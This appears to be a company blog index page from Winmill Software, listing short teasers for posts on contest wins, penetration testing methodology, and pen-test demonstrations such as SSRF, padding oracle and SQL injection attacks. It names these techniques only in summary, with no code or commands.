Winmill Wins 2022 Apex Program Contest Winmill is the winner of the 2022 Micro Focus Apex Program sales enablement competition, which began with a field of 15 contestants, sponsored by Micro Focus and its distribution partner, Arrow ECS. Read More
Conducting Penetration Testing: 7 Steps Are you getting the most out of your pen testing program? Does your penetrating testing services provider follow an execution standard for completeness and quality control? Winmill breaks out its pen testing services into seven phases as they are defined in the Penetration Testing Execution Standard. Read More
Is it Possible to Automate Penetration Testing? Is it a best practice to completely automate penetration testing? The short answer is "no." The key defining feature of a pen test is the presence of a highly skilled human pen tester. An automated penetration test, as commonly understood, is nothing more than a vulnerability assessment. Read More
Application Scan Identifies an SSRF Vulnerability; Penetration Test Finds Exploitation Attack Vectors In this demonstration we leverage a Server-Side Request Forgery (SSRF) vulnerability, and then abuse the privileges of two users to access the root system of the server. Read More
Padding Oracle Attack: Are You Vulnerable? In this demonstration, we will mount a cryptographic attack known as a "padding oracle attack" against a web application that uses an unauthenticated AES-CBC crypto scheme. Read More
Low-Tech Cyber Security Threat Hunting with Bash One of the many useful skills that I learned during my journey to become an Offensive Security Certified Professional was Bash scripting. In this blog, I will share how to use Bash one-liners to extract threat-hunting information from an Apache access.log after a suspected breach. Read More
Winmill Employee Wins Veracode Video Contest Winmill Software Corporation has announced that Ben DiMolfetta, client solutions architect for Winmill, has won Veracode’s “Best Video Series in Demonstrating Software Composition Analysis (SCA).” Read More
Cyber Security: Microsoft Office/Microsoft Support Diagnostic Tool “Follina” Vulnerability Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems. Read More
Penetration Testing: Windows Server 2016 Breached via Web Apps Penetration testers say that, given enough time and resources, any system can be hacked. In this demonstration, we will attack a Microsoft 2016 server with no patchable vulnerabilities without using any exploits. Our entry point will be an Outlook Web Access (OWA) application. Read More
Penetration Test: SYSTEM Access to MSSQL Server via SQL Injection and File Overwrite In this demonstration we will exploit an MSSQL server through a penetration test, involving a series of SQL injections, that will give us unauthorized access to a web application. We will then leverage this access to overwrite a file and execute code which will grant us a reverse shell as SYSTEM into the target MSSQL server. Read More